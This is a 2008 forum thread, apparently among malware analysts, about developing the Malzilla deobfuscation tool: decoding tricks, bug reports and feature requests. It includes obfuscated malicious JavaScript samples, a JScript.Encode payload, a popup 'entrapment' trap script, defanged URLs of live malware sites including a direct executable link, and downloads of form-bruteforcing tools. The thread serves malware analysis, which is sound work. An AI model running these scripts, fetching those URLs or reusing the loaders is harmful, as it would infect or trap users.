e7b7066637a6C70687a72676179776E76866e66967A6B70677A716691796C6f767B7A66697a6c706a79719161799B6F6a7B6f66917a6B706C7a7b666979776F787b6E6568A565709a7A6E6675796A6f797B7066667A6A70697A7065767c6D9A65a56d6969A4667a76796d666279796d66789D637677786D767D6F91687c6a9a6e86696967A5657b6a7a696972a466726da69c666084689B66856b6995A465726D7C6f6971A4977a797D6F6661a46D71667D6a71687B6d706c7D7e699178776F7B796963936A5E74')">
</body>
</html>
And now is where the drudgework of tracing each variable as it's thrown around comes in... I think I'll save it for the morning or tomorrow.
A few things I would like to point about prerequisites for the string passed to the javascript function:
- It needs to be a longer string. "hellohellohellohello" works, when "hello" returns nothing. ("hellohe" was the shortest I could get it)
- As far as I could tell, it can have newlines being passed to it.
- The line "variable10 = variable10 + 256;" is bringing characters being made up above 256, no matter what. AKA it's up to unicode
http://unicode.org/charts/
-
hello bobby
I've came across these issue many times recently.
I and my friend dikex found a way to decode it in script way we used to do.
because it call itself, so we throw it into a variable without changing. eg. var a="....";
and replace "arguments.callee" with the variable.
and we can do what we want to do. eg. replace eval() to ... method.
have fun!
best regards,
jimmyleo
-
Hi Drusepth, hi jimmyleo,
You can't make any single change in the script because it does not check only the length of the function, but it check every single character:
for(A7ck1Wh8H = 0; A7ck1Wh8H < NisOkeH61; A7ck1Wh8H++) {
Xn47RT3Sm = PkKX3bWF0[(Xn47RT3Sm^m6K3yhq2K.charCodeAt(A7ck1Wh8H))&255]^((Xn47RT3Sm>>8)&16777215);
}So, if Xn47RT3Sm does not have expected value at the end of the loop, it means something is changed in the script, and the decoding will not succeed. Just with proper value of this variable the data will decode like it should.
So, I have asked on other board for advice, and I was told to use the oldest trick in decoding - override eval() function.
JavaScript allows re-defining every internal function, so just add this line at the beginning of the script:
function eval(a) {document.write(a)};
This is re-definition of eval() function, so the eval will in the fact call document.write.
This is the only working method for this kind of scripts.
If you use this on other script, just be sure that the script does not do another overriding of eval() (or of any other internal function), after your overriding.
best regards
bobby
-
because it does not check only the length of the function, but it check every single character:
oh ,bobby:
You may not looked my reply carefully. :P
so we throw it into a variable without changing
-
@jimmyleo
Sorry, but I do not understand, even if I read your post a couple of times.
Can you give an example where you can show what are you exactly doing with arguments.callee?
-
it may helps you.
you can do it one step by one until the result reveal.
regards,
jimmyleo
-
I have a bug and feature suggestion related to the 'send to decoder' feature:
* send script to decoder breaks when a script src is closed.. ex:
<script src="poked.js" language="JavaScript"></script>
malzilla thinks the script starts after </script> till EOF
* send script to decoder can be improved on pages with multiple <script>
<script>foo;</script><script>bar;</script>
it would be nice to have a feature to send ALL scripts to decoder
Example malware site exploiting both of these limitations:
hxxp://pokerfinds.com
Thanks,
TJS
-
@TJS
Many thanks for locating this bug.
I did saw it a couple of times, but I didn't located whats producing the bug.
About the sending all the scripts (or should I better say - all the relevant data) - it is not so trivial.
There is a lot of scripts which are using multiple begin and end tags (like in your example), but I also saw a lot of scripts where a part of malicious code is in HTML part:
<html>
<script>function decode_and_run(a){....}</script>
<body
onLoad="decode_and_run('AF123400AA (encrypted data/code) ...')"></body></html>
See, I would need to build some heuristics that can decide if some of the normal HTML events are also relevant, and I do not know how to do that (in the fact, I have an idea, but I do not think that I'll ever have enough time to code it, just like I do not have time for my other ideas like using Malzilla as a scanner that would have signatures of various exploits, or adding more standard DOM objects and functions etc.)
If it would be OK just to have some kind of "Append to Decoder" button (as addition to Send to Decoder), that will be done in 5 minutes.
@jimmyleo
Unfortunately, I didn't succeed to get any results from the files you uploaded.
Do you use IE to run these or are you using any SpiderMonkey-based app (FireFox, Malzilla...)?
-
Finding script start and end points fixed for the given case.
What to do with multiple script tags, Append or Send All?
-
Append could get messy if you start doing cross-domain stuff (i dont want to manually have to clear decoder every time i work on a different site), so maybe a new button to send all to decoder is a good idea. But append is also a good idea because i'm sure there will be cases where your users dont want to send *all* scripts on a page to the decoder....
???
Has anyone else run into this issue? Does anyone have an opinion here?
-
You won't need to clear decoder anymore in the recent future.
Development version on my PC has tabbed interface (multiple tabs for Download and Decoder)
I will upload it as soon as we get (re)solved the emerging bugs/suggestions.
-
Re bobby:
I'm truly sorry for my not explanation.
I used IE to excute this script.
and you can see a following casser decoding.
and you can do the same issue to it.
regards,
jimi.
-
I'm very excited about the tabs feature. :)
-
...just like I do not have time for my other ideas,
like using Malzilla as a scanner that would have signatures of various exploits,
or adding more standard DOM objects and functions etc...
...just thought that this mailing-list thread might be of some interest to you...'Obfuscated web pages':
http://seclists.org/focus-ids/2008/Feb/0016.html
-
Another weird bug for you... still testing with 0.921
The malware script on the URL below breaks malzilla:
hxxp://updatez.info/etc/count.php?o=22
It throws the following error and does not properly decode the script:
Malzilla
-------
Some violation occured
in SpiderMonkey engine
[ OK ]
The page is attached in case the URL gets taken down.
TJS
-
Hi TJS,
There is a trap (or bug) if you change or override eval() function.
The script will stuck in a loop until it gets all the memory/buffers full.
I'll take a closer look at it this evening, after I get back from the job.
I can't decode it neither as it uses document.createElement, and Malzilla does not have this DOM implemented.
Until then, use the following link to grab the exe file (got it from the debugger):
hxxp://updatez.info/etc/getexe.exe?o=1&t=1204173798&i=1416818079&e=1
Hi sowhat-x,
I'll take a look this evening. Thanks.
regards
bobby
-
Uploaded new snapshot:
http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=242804
Please test and report suggestions/bugs
regards
bobby
-
Nice one :)
-
Hi Bobby...
Thanks for the new beta... looks like another solid release. I'm very excited about the tabs feature and it's great to see it coming to a reality!
I've found a bunch of bugs in 0.922 and have some suggestions. They are included below.
Thanks again, and keep up the great work!
-TJS
-----
BUGS
-----
default nab name numbering reuse
- Create new tab [New Tab (2)]
- Close first tab [New Tab (1)]
- Create new tab [expected: New Tab (3), actual: New Tab (2)]
'Decode' - 'Selection length' doesn't display selection length when selection occurs due to a 'Find' operation.
Tools: Numbered list Maker is buggy. It puts a random number of \n before the output. Also, if input contains a blank line then the number of \n in output is much larger... sometimes the output is blank. Never noticed this behavior before.
Inconsistent capitalization in tabs (examples - Numbered list Maker vs. Templated list maker, should M be caps or not?) [I know it's a silly bug]
Settings tab, when maximized (on 1024x768) seems broken. The 'Clipboard monitor triggers' section covers most of the replace eval() section. [i can provide a screenshot if you want it]
Putting & in a URL causes the char to get underlined in tab name (ex. h&ttp://blah.com causes t to get underlined [this is a Windows issue but you can escape it i think])
--------------
SUGGESTIONS
--------------
* CTRL-W to close tab
* Send to decoder to bring decoder window into focus (don't do this for append though)
* make tabs include the top tabs so that you dont need to worry about keeping decode tabs in syc with download tabs
* add a concatenate feature to misc decoders (too many times i see URLs that are split up with "ht"+"tp"+":/".. etc
* download/debugger load from file (sometimes i want to just view a file locally without putting it on a webserver)
* download all (with referrer/proxy/cookie/user agent) on numbered list maker (i think everyone uses this for malware with names like 1.exe or loader1.exe) ;)
* option to disable URL history (i hate autocomplete.. it's good in real browsers, not so much here) :)
-
Hi TJS,
- default tab name numbering reuse - I'll need to think how to generate the tab numbers
- Decode > Selection length - I can't reproduce. Selection length is in next line under Find function here
- I think I just fixed Numbered list maker
- Capitalization - fixed
- Settings tab - will take a look the Align parameter of components, as I can't reproduce
- & in name - I can just filter this character out of the name. It can't be escaped
- CTRL-W - I do not have defined any keyboard shortcuts, will do it in the future for whole app
- Send to Decoder to bring focus - just to make it optional. It was set once, and it is annoying in a lot of cases
- include top tabs - will test that
- concatenate - not so trivial if one variable is concatenated in more than one line
- load from file - option exists, please take a look at right click menu
- Download all is present on Clipboard Monitor page. I'll need to re-think about inclusion of Clipboard Monitor in future versions, as it mess Clipboard.
- URL history - will be optional in future
Which screen resolution you use?
regards
bobby
-
Settings tab, when maximized (on 1024x768) seems broken. The 'Clipboard monitor triggers' section covers most of the replace eval() section. [i can provide a screenshot if you want it]
Sorry, didn't saw that you already mentioned the screen resolution. I saw what you mean.
I'll re-design Settings tab.
-
Another suggestion:
Can you add a checkbox for 'Use Referrer' because sometimes I don't want to use one. Also, I don't like how when I put a new URL it keeps the old Referrer... I understand how this is useful, but I would prefer if when I try to malzilla a new URL it uses the new URL as the referrer or leaves it blank by default.
It would also be nice to have a 'Get to new tab' button in the download section.
Selection length repro:
* Get http://www.malwaredomainlist.com/ then copy/paste page source into decoder
* Search 'Malware', click 'Find'
* 'Malware' is selected, but selection length is 0
Download all in clipboard monitor page makes sense.. I'd still like to avoid having to use the clipboard monitor feature but that's easy enough to work around.
Thanks,
TJS
-
Hi TJS,
I'll make a checkbox for 'Use Referrer', null problemo.
Where you want exactly to have 'Get to new tab'? On Download tab? It does not make sense to me.
Or you mean on download section of Clipboard Monitor?
A question: at creating new tab in Download, should I take some parameters from current tab (User Agent etc.)?
Selection length problem:
It is calculated just if you select something by using mouse. It is triggered on onMouseUp event. Should I change this to work on Find too?
I have added right-click menu to Clipboard Monitor list, so you can paste links by hand. There is no need to keep the Clipboard Monitor running.
btw. Clipboard Monitor does not clear the clipboard anymore. This can lead to other issues, but we will see if this is better than clearing the clipboard.
I've also added right-click menu to Debugger's Variable State list, so one can Copy the data from there if the script does not compile.
-
bobby,saw this over at SourceForge,
and it reminded me somehow what was discussed earlier,
regarding the usability of the 'Hex" view...it's Delphi:
http://sourceforge.net/projects/httpbot
What are your thoughts on this...having Malzilla able to also work in proxy-mode at some moment?
This way someone could also interact directly with the sites in question via his/her browser if needed:
ie.actually have it exploited and also keep records of all actions that took place in the http session...
Not a request,as it is quite a bit of work obviously,just random thoughts regarding future ideas...
-
@sowhat-x
Well, I must admit that I can't manage to add more functionality to Malzilla :(
The existing code needs to be updated all the time because of new scripts which are using new obfuscation techniques, and I can barely manage to get some free time to do that (hope to find some normal job in a couple of months, with normal working times).
Next thing to do is to extend the PScript's functionality, and to work on concatenating variables (TJS' request).
Also, if I can get some help from JavaScript Bridge people (wrapper I use for SpiderMonkey, http://delphi.mozdev.org/ ), I would like to make step-by-step debugger.
Unfortunately, till now I didn't received any useful help from them, and the debuger from the wrapper does not work if I set step-by-step option (Access violation).
Other things that also need attention are the complicated DOM things like document.createElement.
It is used a lot recently, and I still didn't get behind getting access violations when I try to manage it.
You will probably also want to take a look at Fiddler if you want to run malware on lamb-box:
http://www.fiddlertool.com/fiddler/
-
MalZilla is a good project and open source. It is a shame that nobody is able to help you with development, it would give you more time.
-
I agree 100% with what JohnC said...
wish I could actually give a bit of practical help;to be honest,
that's also the main reason I posted the few links to javascript-related blogs couple days ago,
just in case they provide you with a couple of new tricks/ideas or so...
Since it's still a 'one man's show'...patience,and everything will work out eventually... ;)
It's not possible to catch up with everything at once,daily life obligations and the rest:
as a guess in the wild,situation must also be quite 'tricky' at the moment there,
with the latest stuff taking place in the Balkan area...
let's just hope things don't get any worse/more complicated than what they currently are... :-\
And hey,I really mean it when I say 'not request,just random ideas',lol...
I have quite a few of http interceptors around here,perl/python stuff,
some of them I had also converted to standalone exes for use under machines without interpreters...
I'll have to dig my archives and submit them over at some moment during this month...
-
Nice idea about the right click stuff...
About the find length issue-- it's your project, and up to you. I just wanted to report it out because I want to help out in any way that I can :)
I'm not sure about the parameters issue.. I think that if you need the same referrer, then maybe it should remain in the same tab (in other words, don't persist referrer to new tabs) but usually proxy and user agent won't change when an analyst is going through multiple sites...
I agree with sowhat-x that these suggestions are only suggestions.. I don't want to dictate anything here :)
About the 'get to new tab' idea.. Let's say i'm looking at some site in tab (1) and i want to follow a url in a new tab, instead of opening a new tab and then pasting the url, how about letting me paste the url in tab (1) and click open in new tab or something like that.... i dunno, it's just an idea. In ffox/ie7 you can do a control-click on a URL to open it in a new tab- that would be HOT. :)
TJS
-
MalZilla is a good project and open source. It is a shame that nobody is able to help you with development, it would give you more time.
I'd have offered help when he first started developing it but I don't know Delphi .... :( (hoping to find some time to learn both Delphi and Ruby within the next 12 months - don't have much of it free)
-
This page is using decode64() in conjunction with unescape().. Am I doing something wrong or is the decode section in malzilla unable to iterate through decode64()?
Example (live malware):
hxxp://radt.info/?0a2V5d29yZD1Xd3crTWF0dXJlK1ZpcA==
TJS
Attached in case the URL 404s.
-
Decoded just* fine with Malzilla?
*typo correction
<html>
<head>
<title>Www Mature Vip</title>
<meta name="robots" CONTENT="noindex, nofollow, noarchive">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script language="javascript" src="/d.js"></script>
<script language="javascript">
var enter_url = "http://clipsuniverse.com/movie1.php?id=1018&n=pornstars";
var exit_url = "http://clipsuniverse.com/movie1.php?id=1018&n=pornstars";
</script>
<script language="jscript.encode" src="/pop31.js"></script>
</head>
<body onunload="entrapment(0)" bottommargin="0" leftmargin="0" marginheight="0" marginwidth="0" rightmargin="0" topmargin="0">
<script language="javascript">
var sts = "JTNDJTczJTYzJTcyJTY5JTcwJTc0JTIwJTc0JTc5JTcwJTY1JTNEJTIyJTc0JTY1JTc4JTc0JTJGJTZBJTYxJTc2JTYxJTczJTYzJTcyJTY5JTcwJTc0JTIyJTIwJTczJTcyJTYzJTNEJTIyJTY4JTc0JTc0JTcwJTNBJTJGJTJGJTcyJTYxJTY0JTc0JTJFJTY5JTZFJTY2JTZGJTJGJTcwJTY4JTcwJTczJTc0JTYxJTc0JTczJTJGJTcwJTY4JTcwJTJEJTczJTc0JTYxJTc0JTczJTJFJTZBJTczJTJFJTcwJTY4JTcwJTIyJTNFJTNDJTJGJTczJTYzJTcyJTY5JTcwJTc0JTNFJTNDJTZFJTZGJTczJTYzJTcyJTY5JTcwJTc0JTNFJTNDJTY5JTZEJTY3JTIwJTczJTcyJTYzJTNEJTIyJTY4JTc0JTc0JTcwJTNBJTJGJTJGJTcyJTYxJTY0JTc0JTJFJTY5JTZFJTY2JTZGJTJGJTcwJTY4JTcwJTczJTc0JTYxJTc0JTczJTJGJTcwJTY4JTcwJTJEJTczJTc0JTYxJTc0JTczJTJFJTcwJTY4JTcwJTIyJTIwJTYyJTZGJTcyJTY0JTY1JTcyJTNEJTIyJTMwJTIyJTIwJTYxJTZDJTc0JTNEJTIyJTIyJTNFJTNDJTJGJTZFJTZGJTczJTYzJTcyJTY5JTcwJTc0JTNF";
document.write(unescape(decode64(sts)));
</script>
<script src="/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip"></script>
<iframe src="http://clipsuniverse.com/movie1.php?id=1018&n=pornstars" width="100%" height="1500" scrolling="no" frameborder="0"></iframe>
<script language="jscript.encode" src="/pop32.js"></script>
</body>
</html>
<script type="text/javascript" src="http://radt.info/phpstats/php-stats.js.php"></script><noscript><img src="http://radt.info/phpstats/php-stats.php" border="0" alt=""></noscript>
The decode64 function is held in a seperate JS file, so you'd need to copy it over first;
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/d.js
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:26:02:26
*****************************************************************
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + //all caps
"abcdefghijklmnopqrstuvwxyz" + //all lowercase
"0123456789+/="; // all numbers plus +/=
//Heres the decode function
function decode64(inp)
{
var out = ""; //This is the output
var chr1, chr2, chr3 = ""; //These are the 3 decoded bytes
var enc1, enc2, enc3, enc4 = ""; //These are the 4 bytes to be decoded
var i = 0; //Position counter
// remove all characters that are not A-Z, a-z, 0-9, +, /, or =
var base64test = /[^A-Za-z0-9\+\/\=]/g;
if (base64test.exec(inp)) { //Do some error checking
alert("There were invalid base64 characters in the input text.\n" +
"Valid base64 characters are A-Z, a-z, 0-9, ?+?, ?/?, and ?=?\n" +
"Expect errors in decoding.");
}
inp = inp.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do { //Here.s the decode loop.
//Grab 4 bytes of encoded content.
enc1 = keyStr.indexOf(inp.charAt(i++));
enc2 = keyStr.indexOf(inp.charAt(i++));
enc3 = keyStr.indexOf(inp.charAt(i++));
enc4 = keyStr.indexOf(inp.charAt(i++));
//Heres the decode part. There.s really only one way to do it.
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
//Start to output decoded content
out = out + String.fromCharCode(chr1);
if (enc3 != 64) {
out = out + String.fromCharCode(chr2);
}
if (enc4 != 64) {
out = out + String.fromCharCode(chr3);
}
//now clean out the variables used
chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";
} while (i < inp.length); //finish off the loop
//Now return the decoded values.
return out;
}
-
This one uses the jscript.decode function in the script tag, so Malzilla couldn't decode this one unfortunately;
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/pop32.js
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:28:10:28
*****************************************************************
#@~^cgMAAA==r6Pc6bY{!D^Z'rJbP9W^;s+xD hMkYcE@!K4NJQJn^DPrN{^W,hr[Dt'T~4+ro4O{!~1Vm/J3JkrN{B/SUJQE&f)+$J3Jsl+)*yO2,E_E*zOqFGfO~FEQr*&RTZZE_rTWs{OszbvE@*@!&W(LE_r+^O@*J#p~k6P`UO+M{!Ds"xEr#~NK^Es+UOchDrO`E@!K8NJQr+1YP1Vmd/bNxB1Vdr9)Ny{m94vRC++N FqmWROv8% *cW*Xflc!TTZB~mK[4Ck+{BtDYalzJNGh VGC9R:m^DK:+9rCR1Wsz2E8&ktGm0Al7+&^m4/&W^ldtJdS0sm/4Rmm4[-+M/rW '{SZ~!BTB,hk9O4'EFEP4+rL4YxB8vPmVrL 'Bhr9Ns+E@*r_E@!wmDJ3JmhP lh+{BCs^WhU^DbwYz^^+k/EP-ls;'v/mh+GWhCbxB~&@*JQJ@!2mDE3Jm:P lsn'E:G\b+v~7lV!n'EwWaf /S0Qj.VxE3+UY.{!DsQrBP&@*r_E@!aCMJQrlsPxm:xB$ECVbYzv,\l^;+{BtbL4B,z@*@!2l.CsP~xmh+{B8L1WVG.EP-l^;'v[060060E~z@*JQJ@!+hE3J4[PkDm{v2Wa&c/A0_iMVxJ3nxD+.m!DVQEEP5EmsbYz{B4ko4B,8o1WsWM'v:6006W0EPhb[Ot{B8B~tnrTtO'EqB,xCh'B2.K:vPmsboU{BskN9VvPmVsWS?^.bwYz^m//{vdls+GWhlrUEPOXan'El22^kmCObWUzXRktG13Sl\O6slktvPaV;Lbx/aCo'B4OOw=zJhAh hmm.WsnNbl ^K:zLGJonY6sm/4aVmX+MB,&@*r_E@!JW8%r_J^Y@*J#p5xUBAA==^#~@
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:29:49:29
*****************************************************************
var noentrap = 0;
function entrapment(entcount) {
if (noentrap) return true;
entcount++;
document.open();
document.write('<html><head><title>Www Mature Vip</title><style type="text/css"><!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --></style></head><body onunload="entrapment(' + entcount + ')">' +
'<scr' + 'ipt src="/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip"></scr' + 'ipt><scr' + 'ipt type="text/javascript" src="http://radt.info/phpstats/php-stats.js.php"></scr' + 'ipt><noscr' + 'ipt><img src="http://radt.info/phpstats/php-stats.php" border="0" alt=""></noscr' + 'ipt>' +
'<iframe src="http://clipsuniverse.com/movie1.php?id=1018&n=celebs" width="100%" height="1500" scrolling="no" frameborder="0"></iframe>');
document.close();
}
-
This one uses the jscript.decode function in the script tag, so Malzilla couldn't decode this one unfortunately;
Decoder for jscript.encode is on Misc Decoders tab (Decode JS.encode).
-
Ah right hehe ...... I'd forgotten about that :-[
-
Ah right hehe ...... I'd forgotten about that :-[
Not your guilt, I'm the one who does not have enough time to document all the functions.
@TJS
Just to let you know that "concatenate" function is implemented :)
-
woot! :)
-
0.9.3pre3 (0.9.2.3) uploaded to SourceForge one minute ago.
I do not know how much time will take until all the mirrors gets updated, but I hope in a couple of hours it should be available for download.
-
Another suggestion-- can we get 'format text' to work on page content (in 'download' tab)?
Thanks for the new release!
TJS
-
Another suggestion-- can we get 'format text' to work on page content (in 'download' tab)?
Thanks for the new release!
TJS
Format text is gone (with the wind).
It was useless...
It added a line-break after every semi-colon, and that does damage in a lot of cases.
I will search for a better tokenizer for formating text, but as for now I have none that is working like it should.
-
Another suggestion:
Can you add a checkbox for 'Use Referrer' because sometimes I don't want to use one. Also, I don't like how when I put a new URL it keeps the old Referrer... I understand how this is useful, but I would prefer if when I try to malzilla a new URL it uses the new URL as the referrer or leaves it blank by default.
....
Thanks,
TJS
Isn't un-checking Auto-set referrer on Settings tab exactly that what you need?
-
Two responses:
Format text is _NOT_ useless! I use it almost every single time i analyze a malware page. Please don't remove it otherwise I'll be hacking at your source and recompiling a private build for myself with it. I think even in it's limited form it is a great feature to improve readability of scripts.
Referrer settings on the download tab is better because, like using a useragent/cookies/proxy sometimes you want it and sometimes you dont. In most cases, I don't particularly because i usually analyze many sites at the same time which causes me to 'share' the last site I looked at with the current one via referrer. I'm cool with having it on the settings page, but in that case, why not move the proxy, user agent and cookies options there too?
TJS
-
I vote to restore the format code option too :)
-
(http://img364.imageshack.us/img364/9845/gonewiththewindpg4.png)
Rotflmao... ;D
Ok,seriously now...
If it's not much trouble,I also vote for it to be re-included...
-
Hi guys,
The code for that Format text was something like:
if you see a semi-colon, replace it with semi-colon + line break.
Translated to Pascal, that is exactly one line of code.
It is not a problem to bring it back, but that rule for inserting line breaks is simply wrong.
One should take care of tokens, and put a line break only if the semi-colon is the end of a token.
Biggest problem was that, if you click it 2-3 times, your text will end with a bunch of line breaks one after another.
I will really search for better solution. It should not be far away. I just need to study the code of the highlighter I'm using there - the highlighter does know where the end of tokens are.
-
hehe no worries :)
Btw, did you see the code I posted in the Blenders latest thread at MR? (Malzilla couldn't work with it)
-
hehe no worries :)
Btw, did you see the code I posted in the Blenders latest thread at MR? (Malzilla couldn't work with it)
That code is full with references to DOM objects that Malzilla does not support.
After removing some of the references, I've managed to get it decoded.
btw. This page is protected by unregistered version of Right HTML Protector
-
Oh right, hehe
-
Le Format Text Est Mort, Vive Le Format Code!
Who wants to play with new formating?
http://malzilla.sourceforge.net/test/
Pick the new exe (you already have the DLLs from previous downloads). There is new formating for Decode tab.
I'll test tomorrow how good is working with HTML code, to see how to deal with Download tab code formating.
Please test, and tell me if works well or bad for you.
Take into account that the formating can break some code from executing (code checking for function length).
-
Seems to work perfectly :) ......
-
New upload to http://malzilla.sourceforge.net/test/
(overwritten the previous upload)
Please test:
Ctrl + Send to Decoder
Ctrl + Send all to Decoder
Format code on Download tab
-
Works perfectly here :)
-
Just to let you know that now we have a very own hacked version of SpiderMonkey that will let us decode these scripts where we used debugger to see the downloading link for EXE. See the bug report from TJS here: http://www.malwaredomainlist.com/forums/index.php?topic=218.msg2225#msg2225
The process is time-consuming (1-2 minutes for the script attached by TJS), but at the end you will have the source code of the exploit :)
Will upload a new version as soon as I implement this feature in the GUI.
I can't promise that I'll do this in the next few days, so if someone needs this feature urgently I can upload the hacked SpiderMonkey and the instructions on how to use manually this feature.
Happy hacking ;)
-
Idea that came to mind while digging through stuff locally...
Both 'Cookies' and 'Links Parser' extraction are obviously already there....
what about a 'Forms' extraction tab maybe? ::)
I've also have a couple of Delphi sources archived here,
meant exactly for this feature/capability... ;)
-
Hi sowhat-x,
Any examples of files with Forms that would need to be extracted?
I'm not some HTML guru, so I would need a couple of examples to see what needs to be done.
If it is a tag, Malzilla already has a tag extraction engine, I just need to tell it to extract this one too.
Please, write your suggestions here.
Day after tomorrow I'll have some time in the evening to code, so if anyone have a suggestion - please write it before that.
-
Standard code for forms is;
<form name="{VALUE}" action="{FILE}" method="{POST_OR_GET}">
{FIELDS}
</form>
Where {FIELDS} is typically one or more of the following;
<input type="text" ....>
<input type="hidden" ...>
<input type="checkbox" ....>
<input type="password" ....>
<input type="radio" .....>
<textarea .....>
<select ....>
The spec is available at;
http://www.w3.org/TR/html4/interact/forms.html
The spec mentions the use of LABEL for the field names;
<FORM action="http://somesite.com/prog/adduser" method="post">
<P>
<LABEL for="firstname">First name: </LABEL>
<INPUT type="text" id="firstname"><BR>
<LABEL for="lastname">Last name: </LABEL>
<INPUT type="text" id="lastname"><BR>
<LABEL for="email">email: </LABEL>
<INPUT type="text" id="email"><BR>
<INPUT type="radio" name="sex" value="Male"> Male<BR>
<INPUT type="radio" name="sex" value="Female"> Female<BR>
<INPUT type="submit" value="Send"> <INPUT type="reset">
</P>
</FORM>
... but I've never seen anyone use that ..... typically people use td's to seperate these, for example;
<form action="{file}" name="{VALUE}" method="{GET_OR_POST}">
<table>
<tr><td>Name:</td><td><input type="{TYPE}"></td></tr>
</table>
</form>
-
Ah, I got it now, thanks MysteryFCM.
I didn't realize it is about POST forms (thats what I call them, probably wrong but...)
@sowhat-x
Problem is, I don't get it what I should extract here?
You want me to render the form, so you can enter values and send the form data?
Malzilla intentionally does not have any rendering engine. That way it can stay away of being exploited in the same manner like browsers are exploited.
-
Malzilla intentionally does not have any rendering engine. That way it can stay away of being exploited in the same manner like browsers are exploited.
Same reason vURL DE doesn't :)
-
...MysteryFCM was way faster than me in replying,he-he...
yes,it's 'post' forms I was talking about,and actually,
I was afraid of the term being confused with...Delphi 'forms' themselves,lol... :)
Have a look at this python app called 'twill" for example,
among other things,the 'showforms' command can give the very exact idea of it:
http://twill.idyll.org/
Being able to fill in/send 'post' data is not of that much interest I guess,
it's not 'web application' testing after all...I mean,I have never seen some kind of infected page,
that 'rotates'/pushes different exploits and malware,depending on user's input on post forms...
Maybe others more experienced have,I certainly haven't though...brrr...nasty thought...
Simply listing them though,separated from the rest of the html code,would be quite nice...
ie.to have a more 'clean' idea of the html's structure...
-
I did saw some web sites that required POST data to get the process to continue.
In one such case I have worked together with MysteryFCM :)
The fact is, in last two years I have probably saw some 5 such cases.
Some kind of POST editor does exists on my ToDo list for Malzilla, but I didn't gave it any priority and I do not have a clear picture how it should look like.
I still do not have a clear picture what a form tab should show to the user...
List of forms (do every form in HTML have a unique identifier if more than one form is on the page)?
Separate tab for every form found which would show the code of that form?
-
...or another one that came to mind,a really older vb-coded app,
that was called 'Form Scalpel'...it is still available from PacketStorm's repository:
http://packetstormsecurity.org/web/index2.html
Honestly though,don't really bother yourself much with it,
as this is something that simply helps in reading/breaking down the html structure,
ie.it certainly doesn't help in making the malware scripts themselves more 'readable' in any way...
I still do not have a clear picture what a form tab should show to the user...
Something somewhat similar to 'Judas' that I posted today in the forum,
or say like 'Form' came to mind...want me to upload somewhere else instead of Rapidshare?
-
Bobby,
Generally speaking, the form tag will include either "name", "id" or both (e.g. name="{NAME}" or id="{ID}"). However, as nested forms are very rare, it's generally just a case of parsing out everything between the opening and closing form tags (and where more than one form is present, then processing the second, third whatever form).
I'm not sure about Delphi, but with MS XML, it's simply a case of identifying which method it expects (GET or POST), then identifying the fields it is expecting (including the hidden one's), then sending the data it's expecting via an XML request.
To have this in Malzilla would probably be best by doing the following;
1. ID the form and it's action value
2. ID the fields within the form
3. Provide a string builder for the fields the form expects
Obviously it'll not be as simple as I've made it sound, but it's just a thought :)
-
...quickly uploaded both 'Form' and 'Judas' to Googlepages as well,
password is simply 'password',without quotes...
http://sowhatx.googlepages.com/FormFinal.rar
http://sowhatx.googlepages.com/Judas.rar
Note that some AV products flag 'Form' as a 'Hacktool',
since it was meant for bruteforcing html pages,he-he... :D
Edit:Uploaded 'Form Scalpel' as well,same password...
(the extra vb dlls might need regsvr32 first):
http://sowhatx.googlepages.com/FormScalpel.rar
-
Sorry for the late reply... I was pretty busy last couple of days.
New Malzilla uploaded:
https://sourceforge.net/project/showfiles.php?group_id=203466
We are now using hacked SpiderMonkey.
Please also take a look at the new tutorials.
@sowhat-x
Thanks for the uploads. Got them all ;)
-
Nice one cheers :)
-
Heh,compared with earlier v0.91/v0.92 builds,it's miles ahead... ;D
...made a single pdf from the first 3 Malzilla's tutorials for 'offline' usage:
now why would anyone need them if being offline in the first place,
that's something beyond my imagination,he-he...but anyway... :D
http://rapidshare.com/files/102201005/MalzillaIntro.pdf.html
Alternatively:
http://www.megaupload.com/?d=IFMPWEVK
Wasn't really sure on how to handle the scripts in the newest two documents:
on the one hand,I couldn't get them to properly fit as 'static' printed images,
and I also didn't really liked the idea of handling them as pdf 'attachments'.
I preferred to leave them out for the time being,if any other suggestions/ideas arise...
P.S:...ehmm...felt a bit embarrassed...i mean,regarding the 'about' box:
as it's JohnC that's doing all the 'real'/hard work...
-
Just got some time to look at the tutorials too and they're great dude :) (good to see the code I had problems with in there too as it may have confused others too :-[).
-
Great stuff!
When you use malzilla on dual monitors, and malzilla is in focus on the secondary monitor the splash screen stays on top on the primary monitor.
-
@MysteryFCM
There is no offense meant by putting your script there under such title. It is just so that you found an extraordinary example.
Breaking the unicode sequences in a such way like in your script - I didn't saw anything like that before, and I'm really happy that you found it.
It was a reason to add concatenating function to Malzilla and a good lesson (for me) that one must not forget to take a look at some simple things, not always searching for clues in some complicated functions.
I tried to blog about some interesting "species", but Blogspot is a real PITA when it comes to text formating:
http://malzilla.blogspot.com/
I gave up on that blog.
@sowhat-x
Do not undervalue your contribution to Malzilla and to this discussion.
I do not have a lot of feedback on Malzilla, and I appreciate every single post here. That gives me some motivation to work further.
Apart of this thread here, there is one more guy posting in forum provided by SourceForge, one contact per email (asking for Linux version which I promised to finish, but never got time to get it to the same level like Windows version) and some feedback on Ethical Hacker Network.
So, I appreciate your feedback a lot.
@TJS
I got some other reports on strange behavior of that splash screen (try Alt + Tab on single monitor).
